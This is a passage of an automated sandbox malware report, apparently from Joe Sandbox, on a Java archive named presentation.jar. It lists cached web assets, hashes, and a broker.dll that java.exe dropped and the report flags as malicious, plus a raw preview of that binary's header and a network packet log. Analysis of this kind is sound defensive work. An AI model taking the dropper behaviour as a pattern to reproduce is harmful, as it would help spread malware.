                                                                                                                                                                                  Preview: function _truste_eumap(){truste=self.truste||{};truste.eu||(truste.eu={});truste.util||(truste.util={});.(new Image(1,1)).src=("https://consent.trustarc.com/log".replace("http:","https:"))+"?domain=oracle.com&country=ch&state=&behavior=expressed&c="+(((1+Math.random())*65536)|0).toString(16).substring(1);.truste.util.error=function(l,h,k){k=k||{};var j=h&&h.toString()||"",e=k.caller||"";if(h&&h.stack){j+="\n"+h.stack.match(/(@|at)[^\n\r\t]*/)[0]+"\n"+h.stack.match(/(@|at)[^\n\r\t]*$/)[0].}truste.util.trace(l,j,k);if(truste.util.debug||!h&&!l){return}var d={apigwlambdaUrl:"https://api-js-log.trustarc.com/error",enableJsLog:false};.if(d.enableJsLog){delete k.caller;delete k.mod;delete k.domain;delete k.authority;k.msg=l;var i=new (self.XMLHttpRequest||self.XDomainRequest||self.ActiveXObject)("MSXML2.XMLHTTP.3.0");.i.open("POST",d.apigwlambdaUrl,true);i.setRequestHeader&&i.setRequestHeader("Content-type","application/json");.i.send(truste.util.getJSON({info:truste.util.getJSON(k)||"",erro
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\oldcss[1].css
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):19531
                                                                                                                                                                                  Entropy (8bit):5.148684251674867
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:PdaRCcLuJDRUuOlg/HPYxbMzZq7F2cqNYJvPb/aG5hDupXOgqt+:0HLuJDiuOlg/HPubMzZwSNg/vi
                                                                                                                                                                                  MD5:431EA90E739570FDA7F169C183BE4FBE
                                                                                                                                                                                  SHA1:2F7A22A112452C0C02C77545DCB38D65FFB66F80
                                                                                                                                                                                  SHA-256:90F255EBB8406F78FEC80E412DB772F50AD451F4989352763BAF69728AF37369
                                                                                                                                                                                  SHA-512:B35797825EA18F47FD64B70B5DB91D48D625C22380179FC841F5F3E84D0A7D3DFA594FB21776CF147B30ABE704C9AD0A70CBD1E790AFA31586AD5ACD0606536D
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:https://www.java.com/_cache_4ba9/_themesdelivery/JCOM_Base_Theme/assets/css/oldcss.css
                                                                                                                                                                                  Preview: TD.bodycell{background-color:#fff}.orangelink{color:#333}a.orangelink{text-decoration:underline}a.orangelink:hover{text-decoration:none}.orangebold{color:#3e6b8a;font-weight:bold}a.orangebold{text-decoration:underline}a.orangebold:hover{text-decoration:none}.subtitle{font-family:Verdana,Arial,Helvetica,Sans-serif;color:#1e475b;font-weight:bold}H3.black{color:#000;font-weight:bold;display:inline}html table.helpHeader{border:1px solid #e4e2e2;border-bottom-width:2px}th.helpHeader{padding-top:3px;padding-bottom:3px;padding-left:10px;color:#000;text-transform:uppercase;vertical-align:middle;line-height:23px}html th.helpHeader{background:#f0efef repeat-y !important}html th.helpHeader a:visited,html th.helpHeader a:link{color:black;font-weight:bold;text-decoration:none}ul.newlist li{color:red;padding-left:0}TD.gradientHeader{padding-top:3px;padding-bottom:3px;padding-left:10px;color:#000;text-transform:uppercase;vertical-align:middle;line-height:23px}a.gradientHeader{color:#000;text-decorati
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\renderer[1].js
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):846112
                                                                                                                                                                                  Entropy (8bit):5.706281748309152
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24576:inRcPNfZgEmYr1IVohAkk2JdLO+Ma6AkcQ:0RcPNfnr1IVohAkk2JdLO+MaV8
                                                                                                                                                                                  MD5:A8B04F8E85FE22765349A2D75742CF9E
                                                                                                                                                                                  SHA1:5BF2BCCF3679399A65FFBDBB9775999934306B1B
                                                                                                                                                                                  SHA-256:1FE9B2D5C9E775575851158C4338865563B099DD43254FF5E4F1872C78BDCADC
                                                                                                                                                                                  SHA-512:F257AB31C8AAEC33B2A5774C0902732CA6C8AE8D8B74719A3C3FD71B0BA0712749569CCFDA2F16C36BFD5ADDFC79EF1E27F00AF7B8310A95E9EC14BEDC275C3B
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:https://static.oracle.com/cdn/cec/v21.2.1.30/_sitesclouddelivery/renderer/renderer.js
                                                                                                                                                                                  Preview: /** vim: et:ts=4:sw=4:sts=4. * @license RequireJS 2.3.6 Copyright jQuery Foundation and other contributors.. * Released under MIT license, https://github.com/requirejs/requirejs/blob/master/LICENSE. */.var requirejs,require,define;(function(global,setTimeout){var req,s,head,baseElement,dataMain,src,interactiveScript,currentlyAddingScript,mainScript,subPath,version="2.3.6",commentRegExp=/\/\*[\s\S]*?\*\/|([^:"'=]|^)\/\/.*$/gm,cjsRequireRegExp=/[^.]\s*require\s*\(\s*["']([^'"\s]+)["']\s*\)/g,jsSuffixRegExp=/\.js$/,currDirRegExp=/^\.\//,op=Object.prototype,ostring=op.toString,hasOwn=op.hasOwnProperty,isBrowser=!("undefined"==typeof window||"undefined"==typeof navigator||!window.document),isWebWorker=!isBrowser&&"undefined"!=typeof importScripts,readyRegExp=isBrowser&&"PLAYSTATION 3"===navigator.platform?/^complete$/:/^(complete|loaded)$/,defContextName="_",isOpera="undefined"!=typeof opera&&"[object Opera]"===opera.toString(),contexts={},cfg={},globalDefQueue=[],useInteractive=!1;function
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\s_code_remote[1].js
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):3135
                                                                                                                                                                                  Entropy (8bit):5.343899292674586
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:TIx98yes/Y1josQ45kIIJYaygOObTVno4b6GabIufdB:MPTh/Y1E4xISObBrZabddB
                                                                                                                                                                                  MD5:013C759D9E735927DE9443BA35B4FDDB
                                                                                                                                                                                  SHA1:2D14300D76E34B41EFDD5A8EA57E4A79859571F4
                                                                                                                                                                                  SHA-256:BFF04C18BF3D41EA1E9AE7B5C7694782D282907AE8B3BE78B7FED1ACD5D3DB61
                                                                                                                                                                                  SHA-512:0613D1DAB0F61A085229982D9DEEDB50B30A6481B072912B8C4868E5BB973391615A2612394AA4E2F5214174CA5078ECD9D940DE508B062855D6B48793B921F7
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:https://www.java.com/_cache_4ba9/_themesdelivery/JCOM_Base_Theme/assets/js/s_code_remote.js
                                                                                                                                                                                  Preview: /*!.######################################################..# S_CODE_REMOTE.JS..# Version: 1.00..# BUILD DATE: Tue Jul 17 2018 12:05:01 GMT-0400 (Eastern Daylight Time)..# COPYRIGHT ORACLE CORP 2018 [UNLESS STATED OTHERWISE]..######################################################.*/.try{oracle.truste.api.getConsentDecision().consentDecision;oracle.truste.api.getConsentDecision().source}catch(err){var oracle=oracle||{};oracle.truste={};oracle.truste.api={};(function(){var trusteStorageItemName="truste.eu.cookie.notice_preferences";this.getCookieName=function(){return"notice_preferences"};this.getStorageItemName=function(){return trusteStorageItemName}}).apply(oracle.truste);(function(){var trusteCommon=oracle.truste;function getCookie(cookieKey){for(var name=cookieKey+"=",cookieArray=document.cookie.split(";"),i=0;i<cookieArray.length;i++){for(var c=cookieArray[i];" "==c.charAt(0);)c=c.substring(1);if(0==c.indexOf(name))return c.substring(name.length,c.length)}return null}function getLo
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\setupLibs[1].js
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):1672
                                                                                                                                                                                  Entropy (8bit):5.318338031938511
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:xaJ0n6WpZCBqmIuHN2jIw30UfImd0/yqUmeyFC1cwKYmRNymRIoTV/2k/VT7G1Rb:EJ0n6WpZCj0VkU0/yqUHgC1bARJOd
                                                                                                                                                                                  MD5:D0C9B1531E2D775FCFDD46AE7BE117F1
                                                                                                                                                                                  SHA1:6A2EF6AE293DAA32312FF20677F03820BE192C84
                                                                                                                                                                                  SHA-256:0090AF7B11B5B2C49CFD848E2A6A6C2F3223AB36A5C093630804A132412D4883
                                                                                                                                                                                  SHA-512:F7FBEB4E46405194E4675AF16CC0923BBA8A1AFD4E444FB9BBB5A37104E9F0E210E52BB7A07B2D679AE6D6BA7B4038B9E2686E02E02801CB4DF3C19B9C6B9F22
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:https://www.java.com/_cache_4ba9/_themesdelivery/JCOM_Base_Theme/assets/js/setupLibs.js
                                                                                                                                                                                  Preview: var setupJET=function(){var e=SCSRenderAPI,t=e.getThemeUrlPrefix(),n={paths:{omniture:t+"/assets/js/s_code_remote",i18n:t+"/assets/js/dependencies/i18n.min",nls:t+"/assets/translations",installed:t+"/assets/js/installed.min",uninstall:t+"/assets/js/uninstallapplet.min"},config:{i18n:{locale:e.getPageLanguageCode()?e.getPageLanguageCode():"en"}}};requirejs.config(n);var a=document.createElement("script");a.async="async",a.type="text/javascript",a.crossOrigin="crossOrigin",a.src="//consent.trustarc.com/notice?domain=oracle.com&c=teconsent&js=bb&noticeType=bb&text=true&gtm=1&language="+(e.getPageLanguageCode()?e.getPageLanguageCode():"en"),$("head").append(a),(-1<window.location.host.indexOf("prodapp")||-1<window.location.host.indexOf("localhost"))&&fixRelativeLinksStatic(),$(".spsidebar li a[href='"+SCSRenderAPI.getPageLinkUrl(SCS.navigationCurr)+"']").css("font-weight","bold")},START_RENDERING_EVENT="scsrenderstart";document.addEventListener?document.addEventListener(START_RENDERING_EVE
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\theme.deferred.min[1].js
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):8914
                                                                                                                                                                                  Entropy (8bit):5.089447215809406
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:FZavoubOycmVUmbDT5bD4DfAxsAl0Qlgso9QIA2DW8WsY/ADDOmIB:FZcSo14zAxsAlYQIA2qvig
                                                                                                                                                                                  MD5:B6F0D719BC1F8A0DD143AF681743B4AE
                                                                                                                                                                                  SHA1:E18AD9837E2EDE4185E63CB781FAF2D231C2DFEF
                                                                                                                                                                                  SHA-256:E189CC46493B57DE1D751B6554AFDA0A641BAEF1F1A43C7DEF19921A0DBA054F
                                                                                                                                                                                  SHA-512:14B0B05E65F01C5C6EF8AA491DBBABBF889FFB2B49E3A629A3FC37E34296FC8A00E916C337A4288A9C19FF8F987EFD4C36EEB5084AE13F3ECEF965D078F5D86B
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:https://www.java.com/_cache_4ba9/_themesdelivery/JCOM_Base_Theme/assets/js/theme.deferred.min.js
                                                                                                                                                                                  Preview: var debugF = 0 <= location.search.indexOf("debug");..function debug(e) {. debugF && console.log(e).}..function openPopup(e, n, i, o, t, a, d, r, s, w, f) {. popup = window.open(e, n, "width=" + i + ",height=" + o + ",resizable=" + t + ",scrollbars=" + a + ",menubar=" + d + ",toolbar=" + r + ",location=" + s + ",directories=" + w + ",status=" + f), popup.focus().}..function getParameterByName(e) {. var n = window.location.search;. e = e.replace(/[\[\]]/g, "\\$&");. var i = new RegExp("[?&]" + e + "(=([^&#]*)|&|#|$)").exec(n);. return i ? i[2] ? decodeURIComponent(i[2].replace(/\+/g, " ")) : "" : null.}..function processRules(e, n) {. var i = ["equals", "contains", "greaterthan", "lessthan"],. o = ["contains", "equals"];. debug("Got envData"), debug(n), debug("Got Rules"), debug(e);. for (var t = 0; t < e.rules.length; t++) {. var a = e.rules[t];. debug("Checking Rule"), debug(a);. var d = !1;. if ("true" === a.default) return a;. for (var r = !0, s = 0; s < a.
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\trustarc-logo-small[1].png
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:PNG image data, 198 x 34, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):4197
                                                                                                                                                                                  Entropy (8bit):7.949279468766667
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:cf2qaUvpL7qZRfYj76vPQ77VizJQyAcP7/IEPGD83nJ7rW0F1u2:cvtWRy76XQ7HFcPEvDOJ2n2
                                                                                                                                                                                  MD5:01E1B7108FA9F6B54F403309A1616588
                                                                                                                                                                                  SHA1:E3328418159B7371B64A6CFF199B2812C4D0B9C1
                                                                                                                                                                                  SHA-256:91C4A6C4295F8889E8B04339A4A2C2E86D5EEF71BA808164E641D0D8A6435004
                                                                                                                                                                                  SHA-512:EC6E3C4220F6675023674AAFEE3BF13C330028E7AB33333B757294575AD4002E890D7E7FDEE35D94E6388C2472413AFF2CB5B0A9B21CD0E19D0577A7B530BBA2
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:https://consent-pref.trustarc.com/images/trustarc-logo-small.png
                                                                                                                                                                                  Preview: .PNG........IHDR......."......N......sRGB.........IDATx..\.x.E...........V......!..+..DI....Q..Z%.......uU.]5.b.(B.uQ...*.P.C%.`""..@...z..K^..Q.N..........D^.4.i....O...<.x..4.i.....p...v...,..L")...H.W.h)i.UH.")ZI![..$A...>..U>....W.............1fU......A.!.%..R..S...#.h7.t....'.#4....K.&.,=d{..i..h..cp.G.8.EY.....Ak..^....q.6..\..XFI..n.;\h..4P.4P.1.7^]...}..Z...v.M..Z....@..%O.....9.f..JK.| ...c.#..o..^.E..].!...#GF5h.@N.>..Nt..v...3.".v.,..2.~H.i..#..s..$.1..]GG,&g..A./h.=........B.3<..i`.a....6...o....M..&.8...s.=.!.*F!...U01...*i.v.t.,.e....Q..O..o..<...&..).c......~.....7V..U=....P.1...n<....|].e.d.C..~.\.f...Y.d.(.4.S#....u5.mkN.d.o.....Q.P.$$$\.....~...9sr...rFyy9O.N.4.@...y.y..].v.mM+**...,.....il.......|.o...R7=...........!...V@.../11q.pl.GKeh...l.r...).U..}Q..PG...?I'...e.j......P|.`w.......~..A..0...y...._....Q.p....@..<x..s.f.H.l[...y3.j..gz.|.C..."....$77w.*.-.S..ftt.}...{.....t.5.<y...cV.m\R...<...s.]7.*;9.......p..}..q...T..!
                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\~DF398DC74F291C2548.TMP
                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):29745
                                                                                                                                                                                  Entropy (8bit):0.2920107282763179
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:c9lLh9lLh9lIn9lIn9lRx/9lRJ9lTb9lTb9lSSU9lSSU9laAa/9laAC9laAC9lrz:kBqoxxJhHWSVSEabeQ2y
                                                                                                                                                                                  MD5:CE909A43525B3843C907DCBE55E9D7DD
                                                                                                                                                                                  SHA1:8B6E53CCBAAB132FF8100ECB696282F011402047
                                                                                                                                                                                  SHA-256:540A8B39EAF1EF9CF341697FC4CDABBEBDED17B16321398C539639FD17EE1602
                                                                                                                                                                                  SHA-512:027F1DF5288441E3BFF63ABABD90521E2A72DC20FFAC545E0F180483761229D13254375ADA525D3C5155C1BAC6602117B24617A160C4B9D21C30721B9DF17446
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\~DF497FA32C57F4517E.TMP
                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):13077
                                                                                                                                                                                  Entropy (8bit):0.5021412829471236
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:c9lLh9lLh9lIn9lIn9locF9loc9lWs5RzWSkvkQvi:kBqoI3Rs59VWHi
                                                                                                                                                                                  MD5:202425240AA782BFE9CEE388DC728E84
                                                                                                                                                                                  SHA1:62E43D3BBC782CE4AD1CA01DAA3DCB13F5B0ABF3
                                                                                                                                                                                  SHA-256:88353A0E910730A187CF1D33532F82DEF63727A5AF6EDC9AA2FCBBBC242785A8
                                                                                                                                                                                  SHA-512:58DCD0D944955A6905C446312316CA362EAD29ACB184A137D666CEB12D3C018BB554F2F3EFDC7E90F9332950F66EAB428CE26C7ACB6AA62B4A1B92BB03447181
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\~DF9F66EA97E71930AD.TMP
                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):131562
                                                                                                                                                                                  Entropy (8bit):2.9552530496639755
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:kBqoxKEppiRJLZUn7j6gxmU9AHWFzDpFmAPpR1EXYR1V6XwR1uLSZfPnzZTZ1Zq6:umU9A2Fz9nnLqWKwrsYrf
                                                                                                                                                                                  MD5:D5D4BC2F45476C446B68BE0E42967E53
                                                                                                                                                                                  SHA1:39EBC3EBC5BDAC249AA621AFB8D4702933623F33
                                                                                                                                                                                  SHA-256:29BDCEBCED9397FFF278DE2473F05B311A1545479EB830B4D8DA4FECCE84B1D5
                                                                                                                                                                                  SHA-512:182C60FDDB53E9EBA0412E589286E3E1F5F18F5E803DAF200621D558E241117FD81FA8D212653B6425557098BD4855760FB6D34F19E2B162ED94AEAF25C95F01
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                  C:\Users\user\AppData\Local\broker.dll
                                                                                                                                                                                  Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):499712
                                                                                                                                                                                  Entropy (8bit):6.2016592723723285
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:6144:ZtuOlnq3kHzR1XyrOA5/NeQCJkGg5Q8eb2n1J3M5ScnH7dzVxWmuk:3ln/yrPXeXJk55mSn1FM5Syqmu
                                                                                                                                                                                  MD5:AABA239E1C2208A6F00BB10034CBA621
                                                                                                                                                                                  SHA1:2520815CDA4B4CDF652DE337D4C9285E74D2A585
                                                                                                                                                                                  SHA-256:59767B2AC03EB8320A661F410D53A025C8975B12DE796E80B1C84306200F6A75
                                                                                                                                                                                  SHA-512:1C80F3FF51F5D9B53232A1D9FB10C02BF22D8FBD686B76B8C6718B11BF6E834CA5B02C19535F70CBC08ADE26360D0B42C5B944D63516853FB84ACC573614AD16
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                  • Antivirus: Metadefender, Detection: 9%, Browse
                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 28%
                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                  • Filename: presentation.jar, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: presentation.jar, Detection: malicious, Browse
                                                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........H....................................................Z..........q...................................Rich............................PE..L....ct`...........!.....0...........=.......@......................................................................p...\.......d..............................., ...B..............................`...@............@...............................text....!.......0.................. ..`.rdata.......@.......@..............@..@.data...0.... ...@... ..............@....rsrc................`..............@..@.reloc...-.......0...p..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\83aa4cc77f591dfc2374580bbd95f6ba_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                                                                                                                                                                                  Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):45
                                                                                                                                                                                  Entropy (8bit):0.9111711733157262
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:/lwlt7n:WNn
                                                                                                                                                                                  MD5:C8366AE350E7019AEFC9D1E6E6A498C6
                                                                                                                                                                                  SHA1:5731D8A3E6568A5F2DFBBC87E3DB9637DF280B61
                                                                                                                                                                                  SHA-256:11E6ACA8E682C046C83B721EEB5C72C5EF03CB5936C60DF6F4993511DDC61238
                                                                                                                                                                                  SHA-512:33C980D5A638BFC791DE291EBF4B6D263B384247AB27F261A54025108F2F85374B579A026E545F81395736DD40FA4696F2163CA17640DD47F1C42BC9971B18CD
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview: ........................................J2SE.

                                                                                                                                                                                  Static File Info

                                                                                                                                                                                  General

                                                                                                                                                                                  File type:Java archive data (JAR)
                                                                                                                                                                                  Entropy (8bit):7.8997767742025085
                                                                                                                                                                                  TrID:
                                                                                                                                                                                  • Java Archive (13504/1) 62.80%
                                                                                                                                                                                  • ZIP compressed archive (8000/1) 37.20%
                                                                                                                                                                                  File name:presentation.jar
                                                                                                                                                                                  File size:6813
                                                                                                                                                                                  MD5:6c5e7908c3a06aafd6dcebc8a2dcb674
                                                                                                                                                                                  SHA1:d094aef9d24e13ab70f2ef767242be554ed855ae
                                                                                                                                                                                  SHA256:cb8b20c28a0ac697b6f5bd430bd86762f6b9ef635428fe3fe77e174b172ac6f4
                                                                                                                                                                                  SHA512:ea44242147e5c9589c56741059f7a7d6f64062ded254d697c06f754fa688bed0c9b5b79e9feac75d5569f560043ab01d88e427c4318a39c03768527686d53acb
                                                                                                                                                                                  SSDEEP:192:kF+PVnWW4811rRBBTaikn27xcCQgcN0w7tLIdtZU1elD:kF+PV8811TBTaj27KCy0wmseD
                                                                                                                                                                                  File Content Preview:PK........]..R................Secure_Viewer.class.....Vi[.W.~..'.#KTT.E.jP U...]p......hq..8.2.dB.Z..{]Z......>.............N.$.m?.=....s.Yn........._|..............._....?.8%....d\.qQ.%..e|,...Wd|*.3....B.U._.A.>...<!.C@..'.t....*.)..V..1..+X.f.-..)(.n.%

                                                                                                                                                                                  File Icon

                                                                                                                                                                                  Icon Hash:d28c8e8ea2868ad6

                                                                                                                                                                                  Network Behavior

                                                                                                                                                                                  Network Port Distribution

                                                                                                                                                                                  TCP Packets

                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                  May 6, 2021 17:58:10.505778074 CEST49722443192.168.2.3143.204.209.41
                                                                                                                                                                                  May 6, 2021 17:58:10.506170988 CEST49723443192.168.2.3143.204.209.41
                                                                                                                                                                                  May 6, 2021 17:58:10.548083067 CEST44349722143.204.209.41192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:58:10.548495054 CEST44349723143.204.209.41192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:58:10.548835039 CEST49722443192.168.2.3143.204.209.41
                                                                                                                                                                                  May 6, 2021 17:58:10.548938036 CEST49723443192.168.2.3143.204.209.41
                                                                                                                                                                                  May 6, 2021 17:58:10.549284935 CEST49722443192.168.2.3143.204.209.41
                                                                                                                                                                                  May 6, 2021 17:58:10.549583912 CEST49723443192.168.2.3143.204.209.41
                                                                                                                                                                                  May 6, 2021 17:58:10.559942007 CEST44349722143.204.209.41192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:58:10.560168982 CEST49722443192.168.2.3143.204.209.41
                                                                                                                                                                                  May 6, 2021 17:58:10.567368031 CEST44349723143.204.209.41192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:58:10.567519903 CEST49723443192.168.2.3143.204.209.41
                                                                                                                                                                                  May 6, 2021 17:58:10.591331005 CEST44349722143.204.209.41192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:58:10.591345072 CEST44349723143.204.209.41192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:58:10.591562986 CEST44349722143.204.209.41192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:58:10.591578960 CEST44349722143.204.209.41192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:58:10.591603041 CEST44349722143.204.209.41192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:58:10.591620922 CEST44349723143.204.209.41192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:58:10.591639996 CEST44349723143.204.209.41192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:58:10.591655016 CEST44349723143.204.209.41192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:58:10.591692924 CEST49722443192.168.2.3143.204.209.41
                                                                                                                                                                                  May 6, 2021 17:58:10.591784954 CEST49723443192.168.2.3143.204.209.41
                                                                                                                                                                                  May 6, 2021 17:58:10.593436003 CEST44349722143.204.209.41192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:58:10.593450069 CEST44349722143.204.209.41192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:58:10.593487978 CEST44349723143.204.209.41192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:58:10.593506098 CEST44349723143.204.209.41192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:58:10.593568087 CEST49722443192.168.2.3143.204.209.41
                                                                                                                                                                                  May 6, 2021 17:58:10.593568087 CEST49723443192.168.2.3143.204.209.41
                                                                                                                                                                                  May 6, 2021 17:58:10.593669891 CEST49723443192.168.2.3143.204.209.41
                                                                                                                                                                                  May 6, 2021 17:58:10.605093956 CEST49722443192.168.2.3143.204.209.41
                                                                                                                                                                                  May 6, 2021 17:58:10.605273962 CEST49722443192.168.2.3143.204.209.41
                                                                                                                                                                                  May 6, 2021 17:58:10.605405092 CEST49722443192.168.2.3143.204.209.41
                                                                                                                                                                                  May 6, 2021 17:58:10.605555058 CEST49722443192.168.2.3143.204.209.41
                                                                                                                                                                                  May 6, 2021 17:58:10.607528925 CEST49723443192.168.2.3143.204.209.41
                                                                                                                                                                                  May 6, 2021 17:58:10.608552933 CEST49723443192.168.2.3143.204.209.41
                                                                                                                                                                                  May 6, 2021 17:58:10.646162033 CEST44349722143.204.209.41192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:58:10.646187067 CEST44349722143.204.209.41192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:58:10.646244049 CEST49722443192.168.2.3143.204.209.41
                                                                                                                                                                                  May 6, 2021 17:58:10.646269083 CEST44349722143.204.209.41192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:58:10.646797895 CEST44349722143.204.209.41192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:58:10.646933079 CEST49722443192.168.2.3143.204.209.41
                                                                                                                                                                                  May 6, 2021 17:58:10.648885965 CEST44349723143.204.209.41192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:58:10.648902893 CEST44349723143.204.209.41192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:58:10.648988962 CEST44349723143.204.209.41192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:58:10.649034023 CEST49723443192.168.2.3143.204.209.41
                                                                                                                                                                                  May 6, 2021 17:58:10.649075031 CEST49723443192.168.2.3143.204.209.41
                                                                                                                                                                                  May 6, 2021 17:58:10.649535894 CEST44349723143.204.209.41192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:58:10.649548054 CEST44349723143.204.209.41192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:58:10.649620056 CEST49723443192.168.2.3143.204.209.41
                                                                                                                                                                                  May 6, 2021 17:58:10.655194998 CEST49722443192.168.2.3143.204.209.41
                                                                                                                                                                                  May 6, 2021 17:58:10.655277967 CEST49723443192.168.2.3143.204.209.41
                                                                                                                                                                                  May 6, 2021 17:58:10.690535069 CEST44349722143.204.209.41192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:58:10.690558910 CEST44349722143.204.209.41192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:58:10.690587044 CEST44349722143.204.209.41192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:58:10.690602064 CEST44349722143.204.209.41192.168.2.3
